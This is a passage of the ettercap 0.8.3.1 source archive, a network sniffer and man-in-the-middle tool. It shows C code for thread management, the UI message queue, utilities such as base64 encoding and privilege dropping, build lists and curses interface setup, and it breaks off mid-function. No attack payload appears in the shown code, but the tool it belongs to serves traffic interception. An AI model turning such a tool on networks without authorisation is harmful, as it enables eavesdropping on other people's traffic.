INIT_UNLOCK do{ DEBUG_MSG("thread_init_unlock"); pthread_mutex_unlock(&init_mtx); } while(0) /* protos... */ pthread_t ec_thread_detached(char *name, char *desc, void *(*function)(void *), void *args, int detached); /*******************************************/ /* returns the name of a thread */ char * ec_thread_getname(pthread_t id) { struct thread_list *current; char *name; if (pthread_equal(id, EC_PTHREAD_SELF)) id = pthread_self(); /* don't lock here to avoid deadlock in debug messages */ #ifndef DEBUG THREADS_LOCK; #endif LIST_FOREACH(current, &thread_list_head, next) { if (pthread_equal(current->t.id, id)) { name = current->t.name; #ifndef DEBUG THREADS_UNLOCK; #endif return name; } } #ifndef DEBUG THREADS_UNLOCK; #endif return "NR_THREAD"; } /* * returns the pid of a thread * ZERO if not found !! (take care, not -E_NOTFOUND !) */ pthread_t ec_thread_getpid(char *name) { struct thread_list *current; pthread_t pid; /* * if "name" is explicitely set up NULL, the top-level pthread_t * is returned w/o iterating through the thread-list */ if (name == NULL) return EC_PTHREAD_NULL; THREADS_LOCK; LIST_FOREACH(current, &thread_list_head, next) { if (!strcasecmp(current->t.name,name)) { pid = current->t.id; THREADS_UNLOCK; return pid; } } THREADS_UNLOCK; return EC_PTHREAD_NULL; } /* returns the description of a thread */ char * ec_thread_getdesc(pthread_t id) { struct thread_list *current; char *desc; if (pthread_equal(id, EC_PTHREAD_SELF)) id = pthread_self(); THREADS_LOCK; LIST_FOREACH(current, &thread_list_head, next) { if (pthread_equal(current->t.id, id)) { desc = current->t.description; THREADS_UNLOCK; return desc; } } THREADS_UNLOCK; return ""; } /* add a thread in the thread list */ void ec_thread_register(pthread_t id, char *name, char *desc) { ec_thread_register_detached(id, name, desc, JOINABLE_THREAD); } void ec_thread_register_detached(pthread_t id, char *name, char *desc, int detached) { struct thread_list *current, *newelem; if (pthread_equal(id, EC_PTHREAD_SELF)) id = pthread_self(); DEBUG_MSG("ec_thread_register -- [%lu] %s", PTHREAD_ID(id), name); SAFE_CALLOC(newelem, 1, sizeof(struct thread_list)); newelem->t.id = id; newelem->t.name = strdup(name); newelem->t.description = strdup(desc); newelem->t.detached = detached; THREADS_LOCK; LIST_FOREACH(current, &thread_list_head, next) { if (pthread_equal(current->t.id, id)) { SAFE_FREE(current->t.name); SAFE_FREE(current->t.description); LIST_REPLACE(current, newelem, next); SAFE_FREE(current); THREADS_UNLOCK; return; } } LIST_INSERT_HEAD(&thread_list_head, newelem, next); THREADS_UNLOCK; } /* * creates a new thread on the given function */ pthread_t ec_thread_new(char *name, char *desc, void *(*function)(void *), void *args) { return ec_thread_new_detached(name, desc, function, args, JOINABLE_THREAD); } pthread_t ec_thread_new_detached(char *name, char *desc, void *(*function)(void *), void *args, int detached) { pthread_t id; int e; DEBUG_MSG("ec_thread_new -- %s detached %d", name, detached); /* * lock the mutex to syncronize with the new thread. * the newly created thread will call ec_thread_init(), * so at the end of this function we are sure that the * thread had be initialized */ INIT_LOCK; if (detached == DETACHED_THREAD) { pthread_attr_t attr; pthread_attr_init(&attr); pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); if ((e = pthread_create(&id, &attr, function, args)) != 0) ERROR_MSG("not enough resources to create a new thread in this process: %s", strerror(e)); }else { if ((e = pthread_create(&id, NULL, function, args)) != 0) ERROR_MSG("not enough resources to create a new thread in this process: %s", strerror(e)); } ec_thread_register_detached(id, name, desc, detached); DEBUG_MSG("ec_thread_new -- %lu created ", PTHREAD_ID(id)); if ((e = pthread_cond_wait(&init_cond, &init_mtx))) ERROR_MSG("waiting on init_cond: %s", strerror(e)); INIT_UNLOCK; return id; } /* * set the state of a thread * all the new thread MUST call this on startup */ void ec_thread_init(void) { pthread_t id = pthread_self(); int e; DEBUG_MSG("ec_thread_init -- %lu", PTHREAD_ID(id)); INIT_LOCK; /* * allow a thread to be cancelled as soon as the * cancellation request is received */ pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, NULL); pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS, NULL); /* sync with the creator */ if ((e = pthread_cond_signal(&init_cond))) ERROR_MSG("raising init_cond: %s", strerror(e)); INIT_UNLOCK; DEBUG_MSG("ec_thread_init -- (%lu) ready and syncronized", PTHREAD_ID(id)); } /* * destroy a thread in the list */ void ec_thread_destroy(pthread_t id) { struct thread_list *current; if (pthread_equal(id, EC_PTHREAD_SELF)) id = pthread_self(); DEBUG_MSG("ec_thread_destroy -- terminating %lu [%s]", PTHREAD_ID(id), ec_thread_getname(id)); /* send the cancel signal to the thread */ pthread_cancel((pthread_t)id); DEBUG_MSG("ec_thread_destroy -- [%s] terminated", ec_thread_getname(id)); THREADS_LOCK; LIST_FOREACH(current, &thread_list_head, next) { if (pthread_equal(current->t.id, id)) { #ifndef BROKEN_PTHREAD_JOIN if (!current->t.detached) { DEBUG_MSG("ec_thread_destroy: pthread_join"); /* wait until it has finished */ pthread_join((pthread_t)id, NULL); } #endif SAFE_FREE(current->t.name); SAFE_FREE(current->t.description); LIST_REMOVE(current, next); SAFE_FREE(current); THREADS_UNLOCK; return; } } THREADS_UNLOCK; } /* * kill all the registerd thread but * the calling one */ void ec_thread_kill_all(void) { struct thread_list *current, *old; pthread_t id = pthread_self(); DEBUG_MSG("ec_thread_kill_all -- caller %lu [%s]", PTHREAD_ID(id), ec_thread_getname(id)); THREADS_LOCK; #ifdef OS_WINDOWS /* prevent hanging UI. Not sure how this works, but it does... */ if (EC_GBL_IFACE->pcap) ec_win_pcap_stop(EC_GBL_IFACE->pcap); #endif LIST_FOREACH_SAFE(current, &thread_list_head, next, old) { /* skip ourself */ if (!pthread_equal(current->t.id, id)) { DEBUG_MSG("ec_thread_kill_all -- terminating %lu [%s]", PTHREAD_ID(current->t.id), current->t.name); /* send the cancel signal to the thread */ pthread_cancel((pthread_t)current->t.id); #ifndef BROKEN_PTHREAD_JOIN if (!current->t.detached) { DEBUG_MSG("ec_thread_destroy: pthread_join"); /* wait until it has finished */ pthread_join(current->t.id, NULL); } #endif DEBUG_MSG("ec_thread_kill_all -- [%s] terminated", current->t.name); SAFE_FREE(current->t.name); SAFE_FREE(current->t.description); LIST_REMOVE(current, next); SAFE_FREE(current); } } THREADS_UNLOCK; } /* * used by a thread that wants to terminate itself */ void ec_thread_exit(void) { struct thread_list *current, *old; pthread_t id = pthread_self(); DEBUG_MSG("ec_thread_exit -- caller %lu [%s]", PTHREAD_ID(id), ec_thread_getname(id)); THREADS_LOCK; LIST_FOREACH_SAFE(current, &thread_list_head, next, old) { /* delete our entry */ if (pthread_equal(current->t.id, id)) { /* thread is attempting to shut down on its own, check and see if the thread is detached, if not set is as a detached thread since when a thread calls this method, there is no thread that will do the pthread_join to force it to release all of its resources */ if (!current->t.detached) { pthread_detach(id); } SAFE_FREE(current->t.name); SAFE_FREE(current->t.description); LIST_REMOVE(current, next); SAFE_FREE(current); } } THREADS_UNLOCK; /* perform a clean exit of the thread */ pthread_exit(0); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_ui.c000664 000000 000000 00000017355 13711276346 015514 0ustar00rootroot000000 000000 /* ettercap -- user interface stuff Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ struct ui_message { char *message; STAILQ_ENTRY(ui_message) next; }; static STAILQ_HEAD(, ui_message) messages_queue = STAILQ_HEAD_INITIALIZER(messages_queue); /* global mutex on interface */ static pthread_mutex_t ui_msg_mutex = PTHREAD_MUTEX_INITIALIZER; #define UI_MSG_LOCK do{ pthread_mutex_lock(&ui_msg_mutex); }while(0) #define UI_MSG_UNLOCK do{ pthread_mutex_unlock(&ui_msg_mutex); }while(0) /*******************************************/ /* called to initialize the user interface */ void ui_init(void) { DEBUG_MSG("ui_init"); EXECUTE(EC_GBL_UI->init); EC_GBL_UI->initialized = 1; } /* called to run the user interface */ void ui_start(void) { DEBUG_MSG("ui_start"); if (EC_GBL_UI->initialized) EXECUTE(EC_GBL_UI->start); else { DEBUG_MSG("ui_start called initialized"); } } /* called to end the user interface */ void ui_cleanup(void) { if (EC_GBL_UI->initialized) { DEBUG_MSG("ui_cleanup"); EXECUTE(EC_GBL_UI->cleanup); EC_GBL_UI->initialized = 0; } } /* implement the progress bar */ int ui_progress(char *title, int value, int max) { if (EC_GBL_UI->progress) return EC_GBL_UI->progress(title, value, max); return UI_PROGRESS_UPDATED; } /* send an update notification */ void ui_update(int target) { if(EC_GBL_UI->update) { DEBUG_MSG("ui_update"); EC_GBL_UI->update(target); } } /* * the FATAL_MSG error handling function */ void ui_error(const char *fmt, ...) { va_list ap; int n; size_t size = 50; char *msg; /* * we hope the message is shorter * than 'size', else realloc it */ SAFE_CALLOC(msg, size, sizeof(char)); while (1) { /* Try to print in the allocated space. */ va_start(ap, fmt); n = vsnprintf (msg, size, fmt, ap); va_end(ap); /* If that worked, we have finished. */ if (n > -1 && (size_t)n < size) break; /* Else try again with more space. */ if (n > -1) /* glibc 2.1 */ size = n+1; /* precisely what is needed */ else /* glibc 2.0 */ size *= 2; /* twice the old size */ SAFE_REALLOC(msg, size); } /* dump the error in the debug file */ DEBUG_MSG("%s", msg); /* call the function */ if (EC_GBL_UI->error) EXECUTE(EC_GBL_UI->error, msg); /* the interface is not yet initialized */ else fprintf(stderr, "\n%s\n", msg); /* free the message */ SAFE_FREE(msg); } /* * the FATAL_ERROR error handling function */ void ui_fatal_error(const char *msg) { /* * call the function * make sure that the globals have been alloc'd */ if (EC_GBLS && EC_GBL_UI && EC_GBL_UI->fatal_error && EC_GBL_UI->initialized) EXECUTE(EC_GBL_UI->fatal_error, msg); /* the interface is not yet initialized */ else { fprintf(stderr, "\n%s\n\n", msg); exit(-1); } } /* * this fuction enqueues the messages displayed by * ui_msg_flush() */ void ui_msg(const char *fmt, ...) { va_list ap; struct ui_message *msg; int n; size_t size = 50; SAFE_CALLOC(msg, 1, sizeof(struct ui_message)); /* * we hope the message is shorter * than 'size', else realloc it */ SAFE_CALLOC(msg->message, size, sizeof(char)); while (1) { /* Try to print in the allocated space. */ va_start(ap, fmt); n = vsnprintf (msg->message, size, fmt, ap); va_end(ap); /* If that worked, we have finished. */ if (n > -1 && (size_t)n < size) break; /* Else try again with more space. */ if (n > -1) /* glibc 2.1 */ size = n+1; /* precisely what is needed */ else /* glibc 2.0 */ size *= 2; /* twice the old size */ SAFE_REALLOC(msg->message, size); } /* log the messages if needed */ if (EC_GBL_OPTIONS->msg_fd) { fprintf(EC_GBL_OPTIONS->msg_fd, "%s", msg->message); fflush(EC_GBL_OPTIONS->msg_fd); } #ifdef DEBUG /* include user messages in debug log file */ DEBUG_MSG("USER_MSG(): %s", msg->message); #endif /* * MUST use the mutex. * this MAY be a different thread !! */ UI_MSG_LOCK; /* add the message to the queue */ STAILQ_INSERT_TAIL(&messages_queue, msg, next); UI_MSG_UNLOCK; } /* * get the user input */ void ui_input(const char *title, char *input, size_t n, void (*callback)(void)) { DEBUG_MSG("ui_input"); EXECUTE(EC_GBL_UI->input, title, input, n, callback); } /* * this function is used to display up to 'max' messages. * a user interface MUST use this to empty the message queue. */ int ui_msg_flush(int max) { int i = 0; int old = 0; struct ui_message *msg; /* sanity checks */ if (!EC_GBL_UI->initialized) return 0; if (STAILQ_EMPTY(&messages_queue)) return 0; // don't allow the thread to cancel while holding the ui mutex pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &old); /* the queue is updated by other threads */ UI_MSG_LOCK; while ( (msg = STAILQ_FIRST(&messages_queue)) != NULL) { /* diplay the message */ EC_GBL_UI->msg(msg->message); STAILQ_REMOVE_HEAD(&messages_queue, msg, next); /* free the message */ SAFE_FREE(msg->message); SAFE_FREE(msg); /* do not display more then 'max' messages */ if (++i == max) break; } UI_MSG_UNLOCK; pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, &old); /* returns the number of displayed messages */ return i; } /* * empty all the message queue */ int ui_msg_purge_all(void) { int i = 0; struct ui_message *msg; /* the queue is updated by other threads */ UI_MSG_LOCK; while ( (msg = STAILQ_FIRST(&messages_queue)) != NULL) { STAILQ_REMOVE_HEAD(&messages_queue, msg, next); /* free the message */ SAFE_FREE(msg->message); SAFE_FREE(msg); i++; } UI_MSG_UNLOCK; /* returns the number of purgeded messages */ return i; } /* * register the function pointer for * the user interface. * a new user interface MUST implement this * three function and use this function * to hook in the right place. */ void ui_register(struct ui_ops *ops) { BUG_IF(ops->init == NULL); EC_GBL_UI->init = ops->init; BUG_IF(ops->cleanup == NULL); EC_GBL_UI->cleanup = ops->cleanup; BUG_IF(ops->start == NULL); EC_GBL_UI->start = ops->start; BUG_IF(ops->msg == NULL); EC_GBL_UI->msg = ops->msg; BUG_IF(ops->error == NULL); EC_GBL_UI->error = ops->error; BUG_IF(ops->fatal_error == NULL); EC_GBL_UI->fatal_error = ops->fatal_error; BUG_IF(ops->input == NULL); EC_GBL_UI->input = ops->input; BUG_IF(ops->progress == NULL); EC_GBL_UI->progress = ops->progress; EC_GBL_UI->update = ops->update; EC_GBL_UI->type = ops->type; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_utils.c000664 000000 000000 00000021605 13711276346 016230 0ustar00rootroot000000 000000 /* ettercap -- Ettercap utilities Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include #ifdef HAVE_EC_LUA #include #endif #include #define BASE64_SIZE(x) (((x)+2) / 3 * 4 + 1) static const uint8_t map2[] = { 0x3e, 0xff, 0xff, 0xff, 0x3f, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33 }; /* * This function parses the input in the form [1-3,17,5-11] * and fill the structure with expanded numbers. */ int expand_token(char *s, u_int max, void (*func)(void *t, u_int n), void *t ) { char *str = strdup(s); char *p, *q, r; char *end; u_int a = 0, b = 0; DEBUG_MSG("expand_token %s", s); p = str; end = p + strlen(p); while (p < end) { q = p; /* find the end of the first digit */ while ( isdigit((int)*q) && q++ < end); r = *q; *q = 0; /* get the first digit */ a = atoi(p); if (a > max) FATAL_MSG("Out of range (%d) !!", max); /* it is a range ? */ if ( r == '-') { p = ++q; /* find the end of the range */ while ( isdigit((int)*q) && q++ < end); *q = 0; if (*p == '\0') FATAL_MSG("Invalid range !!"); /* get the second digit */ b = atoi(p); if (b > max) FATAL_MSG("Out of range (%d)!!", max); if (b < a) FATAL_MSG("Invalid decrementing range !!"); } else { /* it is not a range */ b = a; } /* process the range and invoke the callback */ for(; a <= b; a++) { func(t, a); } if (q == end) break; else p = q + 1; } SAFE_FREE(str); return E_SUCCESS; } /* * compile the regex */ int set_regex(char *regex) { int err; char errbuf[100]; DEBUG_MSG("set_regex: %s", regex); /* free any previous compilation */ if (EC_GBL_OPTIONS->regex) regfree(EC_GBL_OPTIONS->regex); /* unset the regex if empty */ if (!strcmp(regex, "")) { SAFE_FREE(EC_GBL_OPTIONS->regex); return E_SUCCESS; } /* allocate the new structure */ SAFE_CALLOC(EC_GBL_OPTIONS->regex, 1, sizeof(regex_t)); /* compile the regex */ err = regcomp(EC_GBL_OPTIONS->regex, regex, REG_EXTENDED | REG_NOSUB | REG_ICASE ); if (err) { regerror(err, EC_GBL_OPTIONS->regex, errbuf, sizeof(errbuf)); FATAL_MSG("%s\n", errbuf); } return E_SUCCESS; } char **parse_iflist(char *list) { int i, n; char **r, *t, *p; for(i = 0, n = 1; list[i] != '\0'; list[i++] == ',' ? n++ : n); SAFE_CALLOC(r, n + 1, sizeof(char*)); /* its self-explaining */ for(r[i=0]=ec_strtok(list,",",&p);iec_uid (nobody) */ if (var != NULL) uid = atoi(var); else uid = EC_GBL_CONF->ec_uid; /* get the env variable for the GID to drop privs to */ var = getenv("EC_GID"); /* if the EC_UID variable is not set, default to EC_GBL_CONF->ec_gid (nobody) */ if (var != NULL) gid = atoi(var); else gid = EC_GBL_CONF->ec_gid; reset_logfile_owners(geteuid(), getegid(), uid, gid); DEBUG_MSG("drop_privs: seteuid(%d) setegid(%d)", uid, gid); /* drop to a good uid/gid ;) */ if ( setegid(gid) < 0 ) ERROR_MSG("setegid()"); if ( seteuid(uid) < 0 ) ERROR_MSG("seteuid()"); DEBUG_MSG("privs: UID: %d %d GID: %d %d", (int)getuid(), (int)geteuid(), (int)getgid(), (int)getegid() ); USER_MSG("Privileges dropped to EUID %d EGID %d...\n\n", (int)geteuid(), (int)getegid() ); } /* base64 stuff */ int get_decode_len(const char *b64_str) { int len = strlen(b64_str); int padding = 0; if (len < 2) return 0; if (b64_str[len-1] == '=' && b64_str[len-2] == '=') padding = 2; else if (b64_str[len-1] == '=') padding = 1; return (int)len*0.75 - padding; } int base64decode(const char *src, char **outptr) { int i, v; int decodeLen = get_decode_len(src); char *dst; SAFE_CALLOC(*outptr, decodeLen, sizeof(char)); dst = *outptr; unsigned int sizeof_array = (sizeof(map2) / sizeof(map2[0])); v = 0; for (i=0; src[i] && src[i] != '='; i++) { unsigned int index = src[i] - 43; if (index >= sizeof_array || map2[index] == 0xff) return -1; v = (v << 6) + map2[index]; if (i & 3) { if (dst - *outptr < decodeLen) { *dst++ = v >> (6 - 2 * (i & 3)); } } } return decodeLen; } int base64encode(const char *inputbuff, char **outptr) { static const char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char *ret, *dst; unsigned i_bits = 0; int i_shift = 0; int bytes_remaining = strlen(inputbuff); SAFE_CALLOC(*outptr, bytes_remaining*4/3+4, sizeof(char)); ret = dst = *outptr; while(bytes_remaining) { i_bits = (i_bits << 8) + *inputbuff++; bytes_remaining--; i_shift += 8; do { *dst++ = b64[(i_bits << 6 >> i_shift) & 0x3f]; i_shift -= 6; } while(i_shift > 6 || (bytes_remaining == 0 && i_shift > 0)); } while((dst - ret) & 3) *dst++ = '='; *dst = '\0'; return strlen(*outptr); } /* * Return a 'ctime()' time-string from either: * a 'struct timeval *tv' * or if 'tv == NULL', * returns a time-value for current time. * * NOT threadsafe (returns a static buffer), but there should hopefully * be no problem (?). */ const char *ec_ctime(const struct timeval *tv) { const char *ts_str; static char result[30]; time_t t; if (!tv) t = time(NULL); else t = (time_t) tv->tv_sec; ts_str = ctime(&t); /* ctime() has a newline at position 24. Get rid of it. */ if (ts_str) sprintf(result, "%.24s", ts_str); else #if defined OS_DARWIN snprintf(result, sizeof(result), "%lu.%06d", (unsigned long)tv->tv_sec, tv->tv_usec); #else snprintf(result, sizeof(result), "%lu.%06lu", (unsigned long)tv->tv_sec, tv->tv_usec); #endif return (result); } /* * convert a prefix length to a bit pattern buffer that can be freed * - expects the length of memory to allocate * - expects the prefix mask bit length * - returns a byte string pointer to the allocated memory containing * the bit mask corresponding to the prefix bit length */ u_char *ec_plen_to_binary(size_t buflen, u_int16 plen) { size_t len; u_char *buf, *p; u_int32 i; /* determine the network-host boundary byte */ len = plen % 8 ? plen / 8 + 1 : plen / 8; BUG_IF(len > buflen); /* allocate enough buffer */ SAFE_CALLOC(buf, buflen, sizeof(u_char)); p = buf; for (i = 0; i < len; i++) if (i == len-1) *p++ = 0xff << (8-(plen-8*i)); else *p++ = 0xff; return buf; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ettercap.rc000664 000000 000000 00000002121 13711276346 016402 0ustar00rootroot000000 000000 #include #include "../include/ec_version.h" LANGUAGE 0x09,0x01 ETTERCAP_ICON ICON "contrib/nsis/eNG.ico" #define RC_VERSION EC_VERSION_MAJOR, EC_VERSION_MINOR, EC_VERSION_REVISION, EC_VERSION_SUBREVISION, 0 VS_VERSION_INFO VERSIONINFO FILEVERSION RC_VERSION PRODUCTVERSION RC_VERSION FILEFLAGSMASK 0x3FL #ifdef DEBUG FILEFLAGS 1 #else FILEFLAGS 0 #endif FILEOS VOS__WINDOWS32 FILETYPE VFT_DLL FILESUBTYPE 0x0L BEGIN BLOCK "StringFileInfo" BEGIN BLOCK "040904b0" BEGIN VALUE "CompanyName", "The EtterCap community, https://www.ettercap-project.org\0" VALUE "FileDescription", "EtterCap sniffer\0" VALUE "FileVersion", EC_VERSION "\0" VALUE "InternalName", "ettercap-NG\0" VALUE "OriginalFilename", "ettercap.exe\0" VALUE "ProductName", "The EtterCap sniffer\0" VALUE "ProductVersion", EC_VERSION "\0" VALUE "LegalCopyright", "Copyright " EC_COPYRIGHT " " EC_AUTHORS "\0" END END BLOCK "VarFileInfo" BEGIN VALUE "Translation", 0x409, 1200 END END ettercap-0.8.3.1/src/interfaces/000775 000000 000000 00000000000 13711276346 016374 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/interfaces/CMakeLists.txt000664 000000 000000 00000006534 13711276346 021144 0ustar00rootroot000000 000000 set(EC_TEXT_SRC text/ec_text.c text/ec_text_conn.c text/ec_text_display.c text/ec_text_plugin.c text/ec_text_profile.c text/ec_text_redirect.c ) include_directories(text) set(EC_DAEMON_SRC daemon/ec_daemon.c) include_directories(daemon) if(ENABLE_CURSES) set(EC_CURSES_SRC curses/ec_curses.c curses/ec_curses_filters.c curses/ec_curses_help.c curses/ec_curses_hosts.c curses/ec_curses_live.c curses/ec_curses_logging.c curses/ec_curses_mitm.c curses/ec_curses_offline.c curses/ec_curses_plugins.c curses/ec_curses_start.c curses/ec_curses_targets.c curses/ec_curses_view.c curses/ec_curses_view_connections.c curses/ec_curses_view_profiles.c ) include_directories(curses) set(EC_WDG_SRC curses/widgets/wdg.c curses/widgets/wdg_compound.c curses/widgets/wdg_debug.c curses/widgets/wdg_dialog.c curses/widgets/wdg_dynlist.c curses/widgets/wdg_error.c curses/widgets/wdg_file.c curses/widgets/wdg_input.c curses/widgets/wdg_list.c curses/widgets/wdg_menu.c curses/widgets/wdg_panel.c curses/widgets/wdg_percentage.c curses/widgets/wdg_scroll.c curses/widgets/wdg_window.c ) include_directories(curses/widgets) # add_library(ec_wdg STATIC ${EC_WDG_SRC}) # target_link_libraries(ec_wdg ${EC_LIBS}) endif() if(ENABLE_GTK) if("${GTK_BUILD_TYPE}" STREQUAL "GTK2" OR "${HAVE_GTK3COMPAT}") include_directories(gtk) set(EC_GTK_SRC gtk/ec_gtk.c gtk/ec_gtk_conf.c gtk/ec_gtk_filters.c gtk/ec_gtk_help.c gtk/ec_gtk_hosts.c gtk/ec_gtk_live.c gtk/ec_gtk_logging.c gtk/ec_gtk_menus.c gtk/ec_gtk_mitm.c gtk/ec_gtk_offline.c gtk/ec_gtk_plugins.c gtk/ec_gtk_redirect.c gtk/ec_gtk_start.c gtk/ec_gtk_targets.c gtk/ec_gtk_view.c gtk/ec_gtk_view_connections.c gtk/ec_gtk_view_profiles.c ) else() # full GTK3 support, using gtk3 code include_directories(gtk3) set(EC_GTK_SRC gtk3/ec_gtk3.c gtk3/ec_gtk3_conf.c gtk3/ec_gtk3_filters.c gtk3/ec_gtk3_help.c gtk3/ec_gtk3_hosts.c gtk3/ec_gtk3_live.c gtk3/ec_gtk3_logging.c gtk3/ec_gtk3_menus.c gtk3/ec_gtk3_mitm.c gtk3/ec_gtk3_offline.c gtk3/ec_gtk3_plugins.c gtk3/ec_gtk3_redirect.c gtk3/ec_gtk3_start.c gtk3/ec_gtk3_targets.c gtk3/ec_gtk3_view.c gtk3/ec_gtk3_view_connections.c gtk3/ec_gtk3_view_profiles.c gtk3/ec_gtk3_shortcuts.c ) endif() endif() add_library(ec_interfaces SHARED ../ec_interfaces.c ${EC_TEXT_SRC} ${EC_DAEMON_SRC} ${EC_WDG_SRC} ${EC_CURSES_SRC} ${EC_GTK_SRC}) set_target_properties(ec_interfaces PROPERTIES ENABLE_EXPORTS On POSITION_INDEPENDENT_CODE ON # LINK_INTERFACE_LIBRARIES "" OUTPUT_NAME ettercap-ui VERSION ${VERSION} SOVERSION 0 ) target_link_libraries(ec_interfaces ${EC_INTERFACES_LIBS} ${EC_LIBS}) install(TARGETS ec_interfaces DESTINATION ${INSTALL_LIBDIR}) ettercap-0.8.3.1/src/interfaces/curses/000775 000000 000000 00000000000 13711276346 017700 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/interfaces/curses/ec_curses.c000664 000000 000000 00000044173 13711276346 022030 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* globals */ static wdg_t *sysmsg_win; static char tag_unoff[] = " "; static char tag_promisc[] = " "; /* version */ extern char *curses_version(void); /* proto */ static void curses_interface(void); static void curses_init(void); static void curses_cleanup(void); static void curses_msg(const char *msg); static void curses_error(const char *msg); static void curses_fatal_error(const char *msg); static int curses_progress(char *title, int value, int max); static void curses_update(int target); static void curses_setup(void); static void curses_exit(void); static void toggle_unoffensive(void); static void toggle_nopromisc(void); static void curses_file_open(void); static void read_pcapfile(const char *path, char *file); static void curses_file_write(void); static void write_pcapfile(void); static void curses_unified_sniff(void); static void curses_bridged_sniff(void); static void bridged_sniff(void); static void curses_pcap_filter(void); static void curses_set_netmask(void); /*******************************************/ void set_curses_interface(void) { struct ui_ops ops; /* wipe the struct */ memset(&ops, 0, sizeof(ops)); /* register the functions */ ops.init = &curses_init; ops.start = &curses_interface; ops.type = UI_CURSES; ops.cleanup = &curses_cleanup; ops.msg = &curses_msg; ops.error = &curses_error; ops.fatal_error = &curses_fatal_error; ops.input = &curses_input; ops.progress = &curses_progress; ops.update = &curses_update; ui_register(&ops); DEBUG_MSG("Curses -> %s\n", curses_version()); } /* * set the terminal as non blocking */ static void curses_init(void) { DEBUG_MSG("curses_init"); /* init the widgets library */ wdg_init(); /* * we have to set it because we ask user interaction * during this function. * we cant wait to return to set the flag... */ EC_GBL_UI->initialized = 1; DEBUG_MSG("curses_init: screen %dx%d colors: %d", (int)current_screen.cols, (int)current_screen.lines, (int)(current_screen.flags & WDG_SCR_HAS_COLORS)); /* initialize the colors */ wdg_init_color(EC_COLOR, EC_GBL_CONF->colors.fg, EC_GBL_CONF->colors.bg); wdg_init_color(EC_COLOR_JOIN1, EC_GBL_CONF->colors.join1, EC_GBL_CONF->colors.bg); wdg_init_color(EC_COLOR_JOIN2, EC_GBL_CONF->colors.join2, EC_GBL_CONF->colors.bg); wdg_init_color(EC_COLOR_BORDER, EC_GBL_CONF->colors.border, EC_GBL_CONF->colors.bg); wdg_init_color(EC_COLOR_TITLE, EC_GBL_CONF->colors.title, EC_GBL_CONF->colors.bg); wdg_init_color(EC_COLOR_FOCUS, EC_GBL_CONF->colors.focus, EC_GBL_CONF->colors.bg); wdg_init_color(EC_COLOR_MENU, EC_GBL_CONF->colors.menu_fg, EC_GBL_CONF->colors.menu_bg); wdg_init_color(EC_COLOR_WINDOW, EC_GBL_CONF->colors.window_fg, EC_GBL_CONF->colors.window_bg); wdg_init_color(EC_COLOR_SELECTION, EC_GBL_CONF->colors.selection_fg, EC_GBL_CONF->colors.selection_bg); wdg_init_color(EC_COLOR_ERROR, EC_GBL_CONF->colors.error_fg, EC_GBL_CONF->colors.error_bg); wdg_init_color(EC_COLOR_ERROR_BORDER, EC_GBL_CONF->colors.error_border, EC_GBL_CONF->colors.error_bg); /* set the screen color */ wdg_screen_color(EC_COLOR); /* call the setup interface */ curses_setup(); /* reached only after the setup interface has quit */ } /* * exit from the setup interface */ static void curses_exit(void) { DEBUG_MSG("curses_exit"); wdg_cleanup(); clean_exit(0); } /* * reset to the previous state */ static void curses_cleanup(void) { DEBUG_MSG("curses_cleanup"); wdg_cleanup(); } /* * this function is called on idle loop in wdg */ void curses_flush_msg(void) { ui_msg_flush(MSG_ALL); } /* * print a USER_MSG() extracting it from the queue */ static void curses_msg(const char *msg) { /* if the object does not exist yet */ if (sysmsg_win == NULL) return; wdg_scroll_print(sysmsg_win, EC_COLOR, "%s", (char *)msg); } /* * print an error */ static void curses_error(const char *msg) { wdg_t *dlg; DEBUG_MSG("curses_error: %s", msg); /* create the dialog 